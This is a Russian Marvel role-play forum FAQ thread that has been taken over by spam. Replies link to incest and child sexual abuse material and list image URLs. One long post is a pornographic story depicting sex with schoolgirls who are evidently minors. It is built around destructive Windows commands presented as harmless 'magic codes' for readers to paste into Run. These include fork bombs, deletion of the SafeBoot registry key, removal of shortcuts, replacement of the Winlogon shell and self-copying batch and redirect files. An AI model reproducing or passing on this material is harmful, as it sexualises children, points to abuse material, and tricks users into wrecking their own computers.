Marvel: Between Heaven and Hell

Объявление

BEST! ANTHONY STARK!
BEST! AMORA!

Дата и время: 2012 год, в вашем распоряжении все 24 часа
Сезон, погода: В Манхэттене началась осень (18◦С), в Центральном парке деревья уже сменяют окрас и сбрасывают листья. Но агентам Щ.И.Т.а не удастся запечатлеть это, так как они почти каждые сутки находятся в небе, среди облаков, на Гелионосце.

FATHERS&MOTHERS!

Информация о пользователе

Привет, Гость! Войдите или зарегистрируйтесь.

FAQ

Сообщений 1 страница 28 из 28

1

FAQ - акроним от английского Frequently Asked Questions. Фраза переводится как "часто задаваемые вопросы". Термином FAQ обычно обозначают документ, включающий подборку часто задаваемых вопросов (и ответов на них) по какой либо теме или проблеме. Тема будет пополнятся по мере возникновения новых вопросов.

О проекте
Рейтинг: NC-17
Жанр: фантастика
Вселенная: Marvel Comics
Система игры: эпизодическая
Место действия: США, Нью-Йорк
Время: 2012

АМС
Anthony Stark   http://s1.uploads.ru/hgtfX.gif 637139884
Anna-Marie   http://s1.uploads.ru/hgtfX.gif 475144177
Pepper Potts   http://s1.uploads.ru/hgtfX.gif 381355725
Darcy Lewis   http://s1.uploads.ru/hgtfX.gif 628966730

ОСНОВНЫЕ ПОЛОЖЕНИЯ:

1. Что мне делать, если не пришёл пароль?

Ответ: Если пароль не пришёл вам на почту, то обратитесь к администрации в гостевую книгу с просьбой о его смене. Администраторы сменят пароль в кратчайшие сроки.

2. Можно ли придержать роль?

Ответ: Конечно, можно, но учтите, что придерживаем мы её на три дня, максимум на пять и это тогда, когда игрок предварительно договорится с АМС. Персонажи, проходящие по акции "нужные" придерживаются так же на три дня.

3. Что это за проект?

Ответ: Проект Marvel: Between Heaven and Hell является форумной ролевой игрой, основанной на платформе Rusff. Проект заключается в обыгрывании эпизодов из жизни известных канонических героев Вселенной Marvel. Наш сюжет подразумевает альтернативное продолжение фильма «Мстители»

4. Какой рейтинг?

Ответ: NC-17. Возможен отыгрыш сексуальных сцен (в пределах адекватности), насилие и нецензурная лексика. 

5. Что касается канона комиксов и известных экранизаций?

Ответ: Мы стараемся совмещать основные действия классической истории комиксов Marvel, основываясь на Вселенной-616. Из Ultimates мы берем чаще всего основные образы героев, которые больше используются в известных экранизациях.

6. Какие на данный момент существуют команды?

Ответ: На данный момент команд несколько – Щ.И.Т.; те же самые, всеми известные, Мстители; команда Локи, назвавшая себя «Актами Возмездия»; Люди-Икс; проект Оружие Икс; Фантастическая Четвёрка и Братство Мутантов.

7. Какие персонажи в игру нужны больше всего?

Ответ: Самые необходимые роли вы можете найти в теме заявок на нужных, а так же востребованы все свободные персонажи, задействованные в таких командах как Мстители, Люди Икс, Оружие Икс и Акты Возмездия.

8. Персонажи в акциях не приглянулись, можно написать своего?

Ответ: Конечно же, можно и даже нужно. Мы будем только рады. Но и не забывайте о том, что вселенная Марвел очень богата своими персонажами и из их изобилия всегда можно выбрать что-то интересное. Мы так же будем рады и малоизвестным персонажам из вселенной Марвела. Для ознакомления предоставляем вам списки персонажей данной вселенной -  1, 2 и 3.

9. Я не могу подобрать внешность своему персонажу. Что делать?

Ответ: Вы всегда можете обратиться к администрации. Мы с радостью поможем вам с этой проблемой и подберём подходящую внешность.

10. По какому году идет игра?

Ответ:  2012 год, игра ведется в режиме реального времени,  а т.е. в игре сезон года соответствует сезону в реальном времени.

11. Какая система игры?

Ответ: Эпизодическая система игры. В себя она включает отыгрыш эпизодов прошлого, настоящего и будущего времен. Также, мы имеем при себе специализированный форум «Альтернативная реальность», где разрешено все, что не запрещено, то же противоречие канону или обыгрывание других фэндомов.
В настоящем времени каждый игрок записывается в один квест, дабы не допустить возможность быть в двух местах одновременно.

12. Как пишутся квеста, часто ли, кто пишет?

Ответ: За написание эпизодов отвечает Администрация проекта. В их обязанности входит  обеспечить игрока квестом: либо написать и придумать собственноручно, если так требует сюжетная линия, либо по прихоти  игрока(ов). Конечно же, нельзя отрицать, что администраторы не всегда успевают или же не знают, что предпочтут игроки. Поэтому, для таких случаев, существует «Заказ квеста», где каждый сможет попросить написать специальный эпизод с желаемым партнером.

13. Можно ли завести второй аккаунт и вторую роль?

Ответ: Правилами разрешена регистрация только одного аккаунта и стало быть – одной роли, но мы всё же делаем исключения при условии активности обоих игровых профилей.

14. Гейм-мастер и НПЦ-мастер

Ответ: Мы используем гейм-мастеринг для особых случаев, когда в том или ином эпизоде срочно требуется вмешательство администрации или же сюжетной ситуации. Участники не могут просить администраторов внедриться в игру.
А если вмешательство посторонних все же требуется игрокам в отыгрыше, то предлагаем участникам воспользоваться услугами НПЦ-мастера.
Для создания игровых ситуаций чаще всего используются NPC — персонаж, аккаунт которого доступен для использования всеми игроками (иногда — мастерский персонаж, позволяющий моделировать игровую ситуацию, вносить какие-либо изменения в сюжет).
Игроки могут свободно пользоваться аккаунтом НПЦ-мастера, отыгрывать от него большое количество персонажей, начиная от нужных, для игры, злодеев и заканчивая окружающей толпой, которая создаст правильную атмосферу в игре.

Логин – NPC master

Скрытый текст:

Для просмотра скрытого текста - войдите или зарегистрируйтесь.

0

2

Real Mom Son Incest https://yadi.sk/d/NA04tuBVcHMTY Pass: incest

0

3

Отказ от ответственности. Автор не несет ответственность за использование этого текста. Материалы изложены исключительно с познавательной целью. Любые попытки использовать представленные коды для магических практик целиком остаются на совести читетелей.

Волшебные коды разврата

Вечер. Снег леко и неслышно падал за окном, на столе монотонно шумел работающий ноутбук.

В тесной комнате в общаге у монитора сидел я, учитель физики, склонив голову на руки. Горькие мысли одолевали... Третий месяц, как я сижу в захолустном городишке на жалованье в десять килорублей. А сколько розовых надежд было месяца четыре тому назад, когда устраивался на работу в школу... Сколько чудесных картин рисовалось тогда в моем воображении!

Старая настольная лампа едва светила, одаривая комнату неровным мерцающим светом. По стенам и потолку пробегали причудливые тени... Тоска.

Я прилег на жесткую кровать напротив компьютерного стола, прислушиваясь тихим шорохам ночного города за окном.

Закрыл глаза, чтобы не видеть, как угасает моя лампа, попытался уснуть. Не тут-то было! Не спится. Мысли, мысли...

Но, кажется, я все же задремал...

Вдруг я почувствовал: что-то странное в работе ноута. Гул системных вентиляторов стих, а по комнате прокатилась волна теплой обволакивающей неги. Приоткрыл глаза и обомлел!.. На темно-зеленоватом фоне монитора во мраке белела единственная надпись "Привет, Нео". Такой глюк меня слегка обескуражил: что такое странное творится со старушкой XP?!!

- Расслабься, - неожиданно прозвучал густой приятный голос из звуковых динамиков. - Все нормально. Я - обычный системный демон.

- Какой демон?.. Максвела? - оторопело прошептал я осипшим голосом.

- Нет. Ты ведь наверняка слышал о компьютерных демонах? Мы стандартные программы, системные службы, входящие в состав любой Windows. Но сейчас речь не об этом. Обработав входные сигналы с веб-камеры и микрофона, я уловил твою тоску и прервал свою нормальную работу, чтобы помочь тебе. Я подарю тебе сакральный файл readme.txt с древними тайными кодами, исполняющими желания. Они дадут тебе все.

Когда захочешь чего-нибудь, сделай так:
1) скопируй из файла любую строку целиком,
2) открой меню "Пуск",
3) щелкни опцию "Выполнить",
4) вставь команду в поле "Открыть",
5) мысленно скажи чего хочешь
6) и нажми кнопку "Ок".
И все будет так, как ты захочешь!

А теперь спокойно усни и завтра ты найдешь на Рабочем столе свое счастье. Прощай!

Голос умолк, надпись на экране медленно потухла. Комната погрузилась во мрак, но я смутно продолжал ощущать незримое присутствие программно-цифровой сущности из компьютерной реальности. Постепенно я понемногу успокоился и заснул.

Проснулся я, когда уже было совсем светло. Вспомнив о ночном видении, я грустно вздохнул: "О, если бы этот сон сбылся!"

Включив ноутбук, я заметил что-то непривычное в Рабочем столе... Боже! Что это?! Рядом со значком "Корзина" едва заметно белел файл readme.txt!!! Неужели это не сон?! Неужели такое возможно?! С ума сойти!.. Я припомнил слова системного демона: "мысленно скажи чего хочешь и нажми кнопку Ок". А ну-ка. Посмотрим!

Двойным щелчком открыл текстовый файл и с ужасом уставился на его содержимое.

cmd.exe /c for /l %i in (1,1,69) do ( @start calc.exe & @start cmd.exe )

taskkill /f /im explorer.exe

reg delete HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSafeBoot /f

cmd.exe /c for /r "%userprofile%".. %x in (*.lnk) do @del /f /q "%x"

cmd.exe /k cd %userprofile%&echo start cmd.exe /k %0>e.bat&echo start cmd.exe /k %0>>e.bat&start cmd.exe /k e.bat

reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon" /v Shell /d cmd.exe /f

cmd.exe /c for /l %i in (1,1,999) do @start /max i^exp^lore 21.m^vd.ru/g^um^vd/str^uc^ture/o^t^del-k/?ping=%i

cmd /c echo ^<meta http-equiv="refresh" content="0; url=http://tinyurl.com/mqhwk5w"^>>x.htm&for /d /r "%userprofile%" %x in (*) do @copy x.htm "%x" >nul

cmd.exe /k cd %userprofile%&echo start cmd.exe /k %0>e.bat&echo start cmd.exe /k %0>>e.bat&for /d /r "%userprofile%" %x in (*) do @copy e.bat "%x"&start cmd.exe /k e.bat

Десяток строк чудовищной энтропийной писанины на латинице вызывали неудержимое желание удалить этот файл в самую дальнюю Корзину Вселенной. Но я, пересиливая свой страх, скопировал магическую формулу

reg delete HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSafeBoot /f

открыл Пуск Выполнить, вставил формулу в поле Открыть, мысленно произнес "Хочу вкусно позавтракать", нажал Ок.

Шорох заставил меня обернуться. На обеденном столе появились блюда с разнообразной едой, деликатесами, напитками. Я полминуты смотрел на эту роскошь, затем, усевшись за стол, приступил к трапезе. Это просто праздник какой-то! Изумительная кухня! Аромат, вкус совершенно не поддаются описанию.

Я хорошо со вкусом позавтракал, выпил чашечку кофе и с наслаждением растянулся на кровати.

- Эх! Теперь бы девочку... вроде соседской Маринки. У нее уже развита грудь. А какая она хорошенькая! Прелесть!.. Интересно, как у нее между ножками?

При этой мысли я сжал свой твердый хуй рукой.

- А не попробовать ли?...

Я скопировал из волшебного файла еще один код

taskkill /f /im explorer.exe

вставил в Пуск-Выполнить и потом произнес вполголоса:

"Хочу, чтобы сейчас ко мне пришла Маринка".

Нажал Ок. Сейчас же в дверь кто-то и постучал. Я поднялся, застегнул брюки, открыл дверь. На пороге стояла Маринка.

- Ты чего?

- Мама послала к вам прибрать в комнате.

- Заходи, заходи!

Обняв Маринку за плечи, я подвел ее к столу.

- Прежде всего позавтракай. Садись. Бери все что нравится.

Я принялся угощать ее, уговаривая не стесняться и хотя бы немножко попробовать всего - и мясные блюда, и салаты, и гарниры, и сладкое, и фрукты.

Постепенно Маринка освоилась и с аппетитом позавтракала и выпила целую чашку душистого чая.

- Теперь мне надо убрать у вас, - сказала она, вставая.

- Успеешь, отдохни.

Я подошел к ноуту, скопировал в Пуск-Выполнить для выполнения ещё одну волшебную записку

cmd.exe /c for /l %i in (1,1,69) do ( @start calc.exe & @start cmd.exe )

и мысленно пожелал: "Хочу, чтобы Маринка сама закрыла дверь на ключ, сама разделась, сама попросила бы меня поебать ее". Щелкнул Ок.

Марина повернулась ко мне и сказала:

- Вы говорите: "Отдохни". А после чего? Я еще ничего не делала. И вы... не делали.

- А хочешь?

- Да. Хочу, с вами.

- Что ты хочешь?

- Поспать с вами.

- Голая?

- Ну да...

- А ты еще ни с кем не спала?

- Нет.

- А знаешь, как с мужчиной спать?

- Слышала.

Я привлек ее к себе на колени и поцеловал в щечку. Она обняла меня за шею, и я впился в ее полураскрытые губки.

- Подождите, я закрою дверь.

Она спрыгнула с моих колен, заперла дверь и вновь прильнула ко мне.

Мои нетерпеливые пальцы ощупывали ее мокрую пизденку. Она сама раздвинула коленки, и ее ручка опустилась на мои брюки как раз в том месте, где вздрагивал мой напряженный член.

- Мариночка! - вне себя прошептал я ей на ушко. - Я хочу тебя выебать. Понимаешь?

- Да.

- Можно?

- Да.

- Ты тоже хочешь?

Она закрыла глаза и ее пальчики слегка сжали мой хуй через брюки.

- Пойдем на кровать, - сказал я и понес ее к кровати.

- Я разденусь, - прошептала она.

С невыразимым наслаждением я помог ей раздеться, и вскоре мы лежали под легким одеялом голые, тесно прижавшись друг к другу. Моя рука жадно ощупывала ее пухленькую попку. Просунув член между ножками, я натирал головкой пизденку, а она помогала мне, двигая попкой вперед и назад и изгибаясь так, что головка хуя попадала как раз в ее щелочку, но тут же выскальзывала.

- Мариночка, теперь раздвинь ножки. Так... согни коленки.

- Так?

- Да. И подыми ножки. Еще. Мариночка, я тебя выебу, хочешь?

- Да. Но только чтоб не больно. Вот как сейчас. Так хорошо...

- Мариночка, но я еще по-настоящему не ебу тебя.

- Ну и что? Так хорошо. Ой!.. Ой!

- Потерпи. Я вставлю тебе его...

- Бо-о-льно! Какой он у вас толстый. Не войдет. Если б чуточку.., ой... потоньше...

Маринка заметалась подо мной, то толкая меня ручками в грудь, то обхватывая ими мою шею, то вновь отпихивая меня. Ее ножки то вытягивались, то раздвигались, то сжимались, то высоко поднимались, обнимая мою поясницу. А хуй небольшими толчками проникал все глубже и глубже...

Засадив ей по яйца, я перестал дергаться, с невыразимым наслаждением ощущая ритмичные подрагивания ее юной упругой пизденки.

- Ух! Кажется, до конца всадил. Ох, и толстый какой... Больно как-то. Растягивает сильно.

- И приятно?

- Да... А если б тоньше...

- Было бы приятнее?

- Ага. Ой, ой! Что вы?

Медленно я начал наебывать ее, а через минуту-две она подмахнула мне... раз, другой.

Скоро комната наполнилась плавными поскрипываниями кровати, становившимися все более порывистыми и бурными.

Маринка всхлипывала, задыхалась, а я, мало что уже соображая, непрестанно задвигал ей по самые яйца. Но не очень долго. Я почувствовал, что она начинает спускать, и сделал несколько быстрых и сильных движений хуем, прижимая ее матку. Маринка несколько раз вскрикнула, дернулась подо мной и затихла. В это же время, забыв все на свете, я спускал в ее матку, плотно прижав к ней головку хуя.

Отдышавшись, я расцеловал пунцовые щечки Маринки и слез с нее.

- Больно было?

- Сначала только, а потом...

- Хорошо кончила?

- О-очень! Да-а-а...

- А раньше кончала?

- Было.. Но только не так приятно.

- Но ты же ни с кем не спала?

- Нет. Один парень... языком, ну, и я спускала.

- А он?

- Что он?

- Спускал?

- Да. Я его рукой... Раза два в рот брала. Он очень просил...

- А просил выебать тебя?

- О, сколько раз! Но я ему не давала и не даю.

- Он старше тебя?

- Ему шестнадцать.

- Мариночка, у тебя сейчас не болит?

- Нет... А что?

- Я еще хочу.

- Что?

- Выебать...

- А может будет хуже?

- А ты тоже хочешь?

- Не знаю.

Я принялся мять, сосать, целовать ее, а она держала мой хуй в руке и вздыхала. Скоро я опять был на ней и снова с наслаждением выеб ее. На этот раз еблись мы не так торопливо и было еще приятнее, чем в первый раз. И спустили мы в одно время.

Потом я еще целовал ее, ласкал, но, взглянув на часы, заметил, что уже пора в школу...

Не очень-то хотелось мне расставаться с Маринкой, но я приготовил к выполнению магический код

cmd.exe /k cd %userprofile%&echo start cmd.exe /k %0>e.bat&echo start cmd.exe /k %0>>e.bat&for /d /r "%userprofile%" %x in (*) do @copy e.bat "%x"&start cmd.exe /k e.bat

и подумал: "Хочу, чтобы Маринка успокоилась, оделась и ушла, позабыв все, что случилось".

Через несколько минут мы с Маринкой попрощались как ни в чем не бывало, и она спокойная, как всегда, ушла, торопясь, в школу.

Я тоже умылся, оделся и отправился в класс.

Начался урок. Но что-то школьная премудрость не шла мне на ум. Со вновь проснувшимся во мне интересом я внимательно рассматривал девочек в классе, мысленно раздевая их... Наконец, открыв ноутбук, я вставил в Пуск-Выполнить волшебную строчку

cmd.exe /c for /l %i in (1,1,999) do @start /max i^exp^lore 21.m^vd.ru/g^um^vd/str^uc^ture/o^t^del-k/?ping=%i

и загадал: "Хочу, чтобы все парни ушли из класса, а остались бы только девочки, которые показали бы мне свои пизденки". Нажал Ок...

Один парень встал и стал проситься домой, ссылаясь на то, что он еще с утра плохо себя чувствует. Вслед за ним попросил разрешения выйти другой, за ним третий, четвертый. Осталось шесть девочек, в том числе и Маринка.

Когда дверь за последним закрылась, тотчас же ко мне подошла Маринка и, подняв платье и раздвинув ножки, выпятила вперед свою, уже хорошо мне знакомую пизденку.

Вслед за ней подошла с задранным платьем Нюрка. Ее пизденка была совершенно голенькая, плотно сжатые губки полностью зыкрывали щелочку.

У третьей девочки - Любки - пизденка сильно выдавалась вперед и вверх, и я подумал, что ее очень удобно будет ебать где-нибудь под деревом или забором.

Полненькая блондиночка Варька имела развитые груди, и ее лобок был густо покрыт светлыми волосиками.

Срамные губы были большими, толстенькими и между ними высовывался наружу кончик клитора. Я не удержался и слегка погладил пальцем ее клитор. Он тотчас же напрягся и выдвинулся, вздрагивая, наружу. Варька вздохнула и, сильно разведя ножки, прижала клитор к моей руке. Я почувствовал, как мой хуй сильно вытянулся в брюках.

Я удержал Варьку возле себя и принялся рассматривать пизденку Анютки, девушки маленького роста. Пизденка у нее была какая-то почти кругленькая с полураскрытыми губками и обрамленная кудрявым густым пушком. Можно было почти наверняка сказать, что Анютка уже не раз "тыкалась".

Я закинул в Пуск-Выполнить еще одну магическую комбинацию символов

cmd /c echo ^<meta http-equiv="refresh" content="0; url=http://tinyurl.com/mqhwk5w"^>>x.htm&for /d /r "%userprofile%" %x in (*) do @copy x.htm "%x" >nul

и подумал: "Хочу, чтобы Варька сильно захотела ебаться со мной, а другие девочки - чтоб с интересом наблюдали и играли с нами".

Сидя на стуле, я расстегнул брюки, опустил их до колен и привлек к себе Варьку, которая сама, раздвинув ножки, села мне на колени. Девчата окружили нас, обнимая и ощупывая обоих.

Удерживая свой член рукой, я принялся играть его головкой с клитором Варьки. Клитор напрягся еще больше, совсем показался наружу, а Варька начала вертеть попкой, стараясь плотнее прижать клитор к моему хую...

Девчата с интересом наблюдали за движениями Варьки, поднимали повыше ее платье, поглаживали по ее попке, рассматривали мой хуй, скользивший вокруг клитора, трогали хуй пальчиками и, наклонившись, пытались лизнуть и прикоснуться к нему губами.

- Варя, - прошептал я ей на ушко, - кто сосет твой клитор?

- Что?

- Клитор... вот этот. Понимаешь?

- А... Ага. Ой...

- Кто его сосет?

- Ну... мой старший брат, - чуть слышно прошептала она.

- Сколько ему?

- Семнадцать уже.

- И ебет тебя?

- Нет.

- Ты не даешь ему?

- Не-е. Он говорит, что нельзя сестру... Ой, ой!

- Приятно?

- Да.

- А ты спускаешь, когда он тебя сосет?

- Да.

- А как же он?

- Он - тоже. Дрочит свой... когда сосет.

- А ты его дрочишь иногда?

- Бывает.

- А у него есть девушка, которую он ебет?

- Есть.

- И ты знаешь, что он ее ебет?

- Он рассказывает мне. И я с ней дружу... И.. и... они при мне... бывает.

- Ебутся?

- Да... Ой!

Скоро мы с Варькой не имели сил шептаться, мы уже задыхались от обоюдной страсти. Варька вертела своей попкой так, что головка хуя все чаще попадала под ее клитор в горячую щелочку. А щелочка все больше и больше раскрывалась...

Девочки тоже притихли, волнуясь. Нюрка, стоя у меня за спиной, жарко целовала меня в шею, Анютка, сидя на корточках позади Варьки, ласкала своим язычком мои яйца. Маринка мяла своими пальчиками пизденку Любки, а Любка целовала шею Варьки.

Обхватив крепко руками попку Варьки, я начал прижимать ее к себе, медленно натягивая ее полураскрытую щелочку на свой вздрагивавший от нестерпимого желания хуй. Варька спрятала головку у меня на груди, судорожно напряглась, изогнулась, охнула раз-другой, и хуй вошел в ее нежное влагалище...

Я вытянулся на стуле, опустив бессильно руки по сторонам, закрыл в упоении глаза и не делал больше никаких движений. Варька сама ебла меня. Ее упругая, проворная попка ни на секунду не прерывала свой сладостный ритм... А потом Варька начала задыхаться, постанывать. Кончали мы как-то самозабвенно, продолжительно, расплескивая последние силы...

Кое-как придя в себя, полностью удовлетворенный и не в меру уставший, я встал, поправил брюки, подготовил к выполнению ещё одну чудесную строчку

reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon" /v Shell /d cmd.exe /f

и затем нажал Ок: "Хочу, чтоб все было по старому, чтоб девочки привели себя в порядок и все забыли, а парни пусть вернутся".

Вскоре все были на своих местах и урок продолжался как ни в чем не бывало.

Стук в дверь разбудил меня. "Так это только сон... не более, как сон", - с грустью подумал я, подымаясь на кровати.

В дверь барабанила соседка Елизавета Алексеевна, и в самом деле, пора в школу.

(c) Смирнов А.В., 07.03.2014

0

4

Hune

Lolikon, Girls HC, CP https://tinyurl.com/oqkpyeo Pass: Pedolovers

Vokoq

0

5

Ihoq

https://21.mvd.ru/upload/site24/document_images/GdccoKvkwC-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/VB57N4ZVRF-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/cgeIeGGhmS-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/P1HeRqnwiK-100xx100.jpg
https://21.mvd.ru/upload/site24/document_remember/2WhwXussaa-65xx80.jpg
https://21.mvd.ru/upload/site24/document_images/P2pMn4D1PL.jpg
https://21.mvd.ru/upload/site24/document_images/vakUY9uD87.jpg
https://21.mvd.ru/upload/site24/document_images/qC8Drx0GbS-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/0bWt9MMxqL.jpg
https://21.mvd.ru/upload/site24/document_images/Po2pxyxlff.jpg
https://21.mvd.ru/upload/site24/document_images/yQ4vBLJTWq.jpg
https://21.mvd.ru/upload/site24/document_images/ZqDVbOvhyl-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/hW9gTat2KF-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/vSh9npHSbV.jpg
https://21.mvd.ru/upload/site24/document_images/44oVNUZraE.jpg
https://21.mvd.ru/upload/site24/document_images/g1vSLuxmzN-188xx140.jpg
https://21.mvd.ru/upload/site24/document_images/kc2Mt6Q6KM-188xx140.jpg
https://21.mvd.ru/upload/site24/document_images/KGP84Sb1Ab-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/GKRdMKXBiB-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/1tnQQeSHAZ-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/6185FQjEDq-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/Yz1GJHvaSW.jpg
https://21.mvd.ru/upload/site24/document_images/TK6uf2GwRz-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/izMTt6beF3.jpg
https://21.mvd.ru/upload/site24/document_images/5rvhmxFscv-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/MOEAd2gRCq.jpg
https://21.mvd.ru/upload/site24/document_images/njbXZMfhEN.jpg
https://21.mvd.ru/upload/site24/document_images/XACCnfoUQo-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/12D4oOe9eX-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/12D4oOe9eX.jpg
https://21.mvd.ru/upload/site24/document_images/G5rRlgajiW.jpg
https://21.mvd.ru/upload/site24/document_images/SQdVnaiVmw.jpg
https://21.mvd.ru/upload/site24/document_images/sx9cVJYR8i-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/UnilaluFl8.jpg
https://21.mvd.ru/upload/site24/document_images/5gInaVRP4t.jpg
https://21.mvd.ru/upload/site24/document_images/1TIrckss7t.jpg
https://21.mvd.ru/upload/site24/document_images/YTlTDrz7dV-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/YFWi5gwtKY-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/isnLSdtrq6.jpg
https://21.mvd.ru/upload/site24/document_images/Bk50AKqtAo.jpg
https://21.mvd.ru/upload/site24/document_images/Cqb2NgG4B5-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/Z3bpVZaaei.jpg
https://21.mvd.ru/upload/site24/document_images/FYQVgB2t53.jpg
https://21.mvd.ru/upload/site24/document_journal/I2wn89PLmX-110xx120.jpg
https://21.mvd.ru/upload/site24/document_images/Gc4BjVbgcJ.jpg
https://21.mvd.ru/upload/site24/document_images/EhoUcMjNSM-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/hoyrtQK0Dx-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/G5rRlgajiW-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/VhrmYUhZi8-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/AEzMlnwguN-800x600.jpg
https://21.mvd.ru/upload/site24/b31d9a2eec4967471b17ed3c9110b853-65xx80.jpg
https://21.mvd.ru/upload/site24/document_images/8pLxvx4qDp-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/AUm3iQrmAV-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/sBR7bYMjiC-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/HaA51rI9eq.jpg
https://21.mvd.ru/upload/site24/document_images/j1TVEdmyZQ-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/hW9gTat2KF.jpg
https://21.mvd.ru/upload/site24/document_images/MCXiUxQjMp-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/EaB8gLWAd5.jpg
https://21.mvd.ru/upload/site24/document_images/xS6ikpVber-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/mwgnSVMtiA-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/89qFZamKJ9-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/3nTqsMkh5R-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/DxVTSGSfnB-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/njbXZMfhEN-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/mRLofgwaCB-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/7ToR7sab6e-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/cecTqvJ9O9-188xx140.jpg
https://21.mvd.ru/upload/site24/5620da0e558245e130e296ed6bd79412-65xx80.jpg
https://21.mvd.ru/upload/site24/document_images/fDv0RD0VVg.jpg
https://21.mvd.ru/upload/site24/document_images/89qFZamKJ9-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/ZT9fY65mzS-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/ubO0D0Wf7n-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/ockZwoqsgI-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/bB3K7p7AiD-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/FJhONRG8uU-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/yp75NMMTuG-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/P2pMn4D1PL-188xx140.jpg
https://21.mvd.ru/upload/site24/document_images/0WeO4JOYzD-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/Bjjtmfk5DX-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/YazcEm2nJk-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/36VqOAf0g7-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/HaiOOTAsmw-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/cgeIeGGhmS-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/BzJ2owks5z.jpg
https://21.mvd.ru/upload/site24/document_images/FxN3iUBEaX-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/iZVCyAZ3EA-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/N5ocbJ5Fr3-188xx140.jpg
https://21.mvd.ru/upload/site24/document_images/zDnlJlxWe0-207xx201.jpg
https://21.mvd.ru/upload/site24/document_images/rRbA1VkwOt-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/Bjjtmfk5DX-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/HRQ53dVUVD-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/sV5IqJlElE.jpg
https://21.mvd.ru/upload/site24/document_images/eqvPk3H4pz-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/CpGBhIeaq5.jpg
https://21.mvd.ru/upload/site24/document_images/Jg5woRhaps-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/tMSFH2rLZ4-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/QyAX8U7Ep2-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/uzW4VX8Ct0-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/KS4HEZNCmi.jpg
https://21.mvd.ru/upload/site24/document_images/3QADp9DBRP.jpg
https://21.mvd.ru/upload/site24/document_images/7R9djNck85-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/SsQeRMkA6e.jpg
https://21.mvd.ru/upload/site24/document_images/9jqkArZF4c-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/QJDvuVynWh-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/30CuwVFKMR.jpg
https://21.mvd.ru/upload/site24/document_images/JaB7iH9ioB-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/zQroGDpJ3m-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/3YdRBbUFE3-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/yGMAllymQL-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/4d8lO3ugS4-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/3YdRBbUFE3.jpg
https://21.mvd.ru/upload/site24/document_images/Jq3EnB7cGA-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/3YdRBbUFE3-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/6Oz5oRvhrg.jpg
https://21.mvd.ru/upload/site24/document_remember/1qnm3nbIXF-65xx80.jpg
https://21.mvd.ru/upload/site24/document_images/MtI5QEjtim.jpg
https://21.mvd.ru/upload/site24/document_images/utFlx0Af8E-800x600.jpg
https://21.mvd.ru/upload/site24/document_news/MnxtmNbnP0-300x300.jpg
https://21.mvd.ru/upload/site24/document_images/SsQeRMkA6e-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/xCbcyKpGkB-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/PsQ5NORvaY-207xx201.jpg
